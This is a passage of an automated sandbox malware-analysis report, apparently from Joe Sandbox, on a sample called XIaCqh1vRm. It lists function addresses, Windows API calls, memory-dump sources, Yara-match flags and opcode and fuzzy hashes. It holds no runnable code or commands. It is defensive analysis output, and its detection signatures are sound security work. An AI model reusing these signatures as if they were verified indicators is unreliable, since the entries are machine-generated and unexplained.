                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                                                          Function 024C3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,024BC4A4,E0830C40,?,?,?,?,?,?,024C425F,0249E03C,024BC4A4,?,024BC4A4,024BC4A4,0249E03C), ref: 024C3B2C
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 024C3BA7
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 024C3BC2
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,024BC4A4,00000001,?,00000005,00000000,00000000), ref: 024C3BE8
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C07
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,0249E03C,00000001,024C425F,00000000,?,?,?,?,?,?,?,?,?,024C425F,0249E03C), ref: 024C3C40
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                          • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                          • Instruction ID: 62546ae6c4c06f584debaa7933d804e032d36d239a92dff931377c6f7ae1bd3e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8451D7759002099FDB10CFA9D884AEEBBF4EF09704F24815FE555E7291E7309681CF65
                                                                                                                                                                                                                                                                          Function 024B4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024B4ACD
                                                                                                                                                                                                                                                                            • Part of subcall function 024B4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024B4800), ref: 024B4DAC
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024B4AE2
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4AF1
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B4AFF
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024B4B75
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B4BB5
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B4BC3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3151764488-0
                                                                                                                                                                                                                                                                          • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction ID: a628bbbd2d348ce29d9d0df7e48769a6e4244e10d226924f0f8b5281cf18a5be
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8831EA39A002149BCF06EF69C8A1BAE73B9FF45710F20456BD91597342DB70DE01DBA4
                                                                                                                                                                                                                                                                          Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                          • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                                                          Function 024CFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                          • Instruction ID: 0712ba03e109f8226f459bfa4cec96e6b59cc2fe8c8c847ce00823193b087448
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511B739704115BBDB612F7ACC489AB7A6EEF82721B21061FFC16D7240DB348845DAB0
                                                                                                                                                                                                                                                                          Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                          • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                          Function 024CA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024CA331: _free.LIBCMT ref: 024CA35A
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA638
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA643
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA64E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA6A2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA6AD
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA6B8
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA6C3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                          • Instruction ID: d60e3b10f5a541f1e3c712431f81d847c3e58f04d546d41ca474a2eb30efb138
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11B4B5605B18AADEB0BF77CC55FCF7B9EDF00700F50482EA299AA160D6A4B4114F40
                                                                                                                                                                                                                                                                          Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                          • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                          • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                          Function 024A2659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A2667
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A266D
                                                                                                                                                                                                                                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A269A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26A4
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024A0DA0,?,?,?,00000000), ref: 024A26B6
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A26CC
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A26DA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                          • Instruction ID: 0e8d175086ac41bcc4a545e07c95b9ab4c1cc92e552ad1b8c15ade6ff792488d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A01A735502115A7D720FF6AEC58FAF376CAF52F52B50042BF805D2160EBA4D9449AB8
                                                                                                                                                                                                                                                                          Function 024A24A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                          • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                          • Instruction ID: 5f1891afa62f468227035c915ee513812fc5e4264239869d0fd027f1f7355b9f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF0F9759003103FF7117B757D6981B3FACDD5AA23320023BF802E2291EBB5C5019658
                                                                                                                                                                                                                                                                          Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                          • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                                                          • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                                                          Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275183328-0
                                                                                                                                                                                                                                                                          • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                          • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                                                          Function 024C239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024C25EC,00000001,00000001,?), ref: 024C23F5
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024C25EC,00000001,00000001,?,?,?,?), ref: 024C247B
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024C2575
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 024C2582
                                                                                                                                                                                                                                                                            • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 024C258B
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 024C25B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                          • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                          • Instruction ID: 4fec622c4c30e76500a84d4467b0b69da0c4c77b5589304af15b26128b3279da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E51E076A00216ABDB25CF68CC60EBF77AAEB44654F254A2EFC04D6250DBF4DD41CA60
                                                                                                                                                                                                                                                                          Function 024BE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __cftoe
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                          • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                          • Instruction ID: 897b4212b920e9473e79831338d45d68ce6dfad61efd5791283137d9a4fd4607
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6751EB36A00205ABDF269FA9CC40BEF77A9EF88334F90425FF815D6281EB71D5518A74
                                                                                                                                                                                                                                                                          Function 024B302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024B3051
                                                                                                                                                                                                                                                                            • Part of subcall function 024A8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024A8ABD
                                                                                                                                                                                                                                                                          • SafeSQueue.LIBCONCRT ref: 024B306A
                                                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 024B312A
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B314B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B3159
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3496964030-0
